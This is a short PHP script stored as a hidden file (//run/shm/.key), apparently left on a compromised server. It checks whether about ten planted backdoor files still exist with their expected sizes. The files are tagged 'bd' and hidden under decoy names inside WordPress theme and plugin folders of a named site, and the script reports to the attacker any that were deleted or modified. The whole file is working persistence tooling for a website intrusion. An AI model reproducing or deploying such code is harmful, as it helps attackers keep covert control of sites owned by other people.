File: //run/shm/.key
<?php $r = '/home/dh_n7h4jk/jimdiliberto.com'; $x = ["/wp-content/themes/twentynineteen/template-parts/header/galleries/add.php"=>"bd@@5850877@@981",
"/wp-content/plugins/lightbox-popup/images/featured_plugins/i18ns/bulgarian.php"=>"bd@@8674821@@1518",
"/wp-content/plugins/flow-flow-social-streams/includes/tabs/index.php"=>"bd@@8596323@@804",
"/wp-content/plugins/siteorigin-panels/settings/tpl/cssjs/suggestcategory.php"=>"bd@@7213343@@900",
"/wp-content/plugins/all-in-one-seo-pack/vendor_prefixed/psr/post-catalog/metaweblogapi.php"=>"bd@@8435233@@878",
"/wp-content/themes/skt-photo-world/inc/includes/photos/phocagalleryco.php"=>"bd@@7175310@@972",
"/wp-content/plugins/lightbox-popup/images/featured_plugins/i18ns/bulgarian.php"=>"bd@@5864104@@943",
"/e01ed9/index.php"=>"bd@@8458160@@178719",
"/wp-content/themes/flatio/index.php"=>"bd@@7370683@@3363",
"/wp-content/plugins/so-widgets-bundle/widgets/features/jquery3/ex.php"=>"bd@@8362751@@7027"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');